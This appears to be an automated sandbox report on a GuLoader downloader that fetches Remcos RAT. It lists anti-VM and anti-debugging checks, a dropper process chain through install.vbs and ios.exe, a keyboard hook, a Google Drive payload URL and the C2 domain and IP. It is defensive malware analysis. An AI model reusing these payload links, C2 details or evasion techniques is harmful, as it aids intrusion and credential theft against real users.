Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW]
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: LegalCopyrightCopyright (C) 1998-2021 VMware, Inc.Z
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326362275.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478101501.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: noreply@vmware.com0
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: FileDescriptionVMware SVGA 3D Device API Module:
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: vm3ddevapi64-release.dll.0.dr Binary or memory string: Software\VMware, Inc.\VMware SVGA
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1326864839.0000000004ED9000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ios.exe, 00000019.00000002.2478654815.0000000004F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6F7C1BFF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7960 rdtsc 0_2_032C7960
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CA5B0 mov eax, dword ptr fs:[00000030h] 0_2_032CA5B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C61B3 mov eax, dword ptr fs:[00000030h] 0_2_032C61B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2BF7 mov eax, dword ptr fs:[00000030h] 0_2_032D2BF7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C mov ebx, dword ptr fs:[00000030h] 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C mov eax, dword ptr fs:[00000030h] 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D187E mov eax, dword ptr fs:[00000030h] 0_2_032D187E
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D10E6 mov eax, dword ptr fs:[00000030h] 0_2_032D10E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CE2DD mov eax, dword ptr fs:[00000030h] 0_2_032CE2DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 mov ebx, dword ptr fs:[00000030h] 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 mov eax, dword ptr fs:[00000030h] 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F mov eax, dword ptr fs:[00000030h] 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C mov eax, dword ptr fs:[00000030h] 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F56A mov eax, dword ptr fs:[00000030h] 8_2_0166F56A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166BFC9 mov eax, dword ptr fs:[00000030h] 8_2_0166BFC9
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166EDD2 mov eax, dword ptr fs:[00000030h] 8_2_0166EDD2
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_016708E3 mov eax, dword ptr fs:[00000030h] 8_2_016708E3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032F61B3 mov eax, dword ptr fs:[00000030h] 25_2_032F61B3
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FA5B0 mov eax, dword ptr fs:[00000030h] 25_2_032FA5B0
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_03302BF7 mov eax, dword ptr fs:[00000030h] 25_2_03302BF7
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C mov ebx, dword ptr fs:[00000030h] 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FAC1C mov eax, dword ptr fs:[00000030h] 25_2_032FAC1C
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_0330187E mov eax, dword ptr fs:[00000030h] 25_2_0330187E
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_033010E6 mov eax, dword ptr fs:[00000030h] 25_2_033010E6
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_032FE2DD mov eax, dword ptr fs:[00000030h] 25_2_032FE2DD
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C79FF LdrInitializeThunk, 0_2_032C79FF
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe "C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Users\user\AppData\Roaming\ios.exe C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managervider
Source: ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerrthur
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerMx
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27V
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\J{
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\ y
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager27VY7\_x
Source: ios.exe, 0000001F.00000003.2412096312.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5718341347.000000000185E000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412745799.00000000017F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Source: ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [Program Manager]
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 632533 Sample: SecuriteInfo.com.UDS.Trojan... Startdate: 23/05/2022 Architecture: WINDOWS Score: 96 60 dwilsonson23.sytes.net 2->60 62 googlehosted.l.googleusercontent.com 2->62 64 2 other IPs or domains 2->64 68 Found malware configuration 2->68 70 Antivirus detection for dropped file 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 4 other signatures 2->74 11 SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe 7 32 2->11         started        15 ios.exe 20 2->15         started        signatures3 process4 file5 44 C:\Users\user\...\vm3ddevapi64-release.dll, PE32+ 11->44 dropped 46 C:\Users\user\AppData\...\portaudio_x64.dll, PE32+ 11->46 dropped 48 C:\Users\user\AppData\Local\...\System.dll, PE32 11->48 dropped 50 C:\Users\user\AppData\Local\...\DiFxAPI.dll, PE32+ 11->50 dropped 82 Tries to detect Any.run 11->82 17 SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe 4 10 11->17         started        52 C:\Users\user\AppData\Local\...\System.dll, PE32 15->52 dropped 22 WerFault.exe 21 15->22         started        signatures6 process7 dnsIp8 56 googlehosted.l.googleusercontent.com 142.250.185.129, 443, 49765, 49771 GOOGLEUS United States 17->56 58 drive.google.com 142.250.186.142, 443, 49764, 49770 GOOGLEUS United States 17->58 38 C:\Users\user\AppData\Roaming\ios.exe, PE32 17->38 dropped 40 C:\Users\user\...\ios.exe:Zone.Identifier, ASCII 17->40 dropped 42 C:\Users\user\AppData\Local\...\install.vbs, data 17->42 dropped 76 Tries to detect Any.run 17->76 24 wscript.exe 1 17->24         started        file9 signatures10 process11 process12 26 cmd.exe 1 24->26         started        process13 28 ios.exe 20 26->28         started        32 conhost.exe 26->32         started        file14 54 C:\Users\user\AppData\Local\...\System.dll, PE32 28->54 dropped 84 Tries to detect Any.run 28->84 34 ios.exe 2 7 28->34         started        signatures15 process16 dnsIp17 66 dwilsonson23.sytes.net 185.20.186.103, 3013, 49772 DELTAHOST-ASUA Ukraine 34->66 78 Tries to detect Any.run 34->78 80 Installs a global keyboard hook 34->80 signatures18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.185.129
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
142.250.186.142
 drive.google.com United States
15169 GOOGLEUS false
185.20.186.103
 dwilsonson23.sytes.net Ukraine
42159 DELTAHOST-ASUA true

Contacted Domains

Name IP Active
dwilsonson23.sytes.net 185.20.186.103 true
dual-a-0001.a-msedge.net 204.79.197.200 true
drive.google.com 142.250.186.142 true
e-0009.e-msedge.net 13.107.5.88 true
googlehosted.l.googleusercontent.com 142.250.185.129 true
doc-0o-68-docs.googleusercontent.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dwilsonson23.sytes.net true
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download false
    		high
    https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli4rihm7727e1v30p2jqpcricp/1653325350000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download false
      		high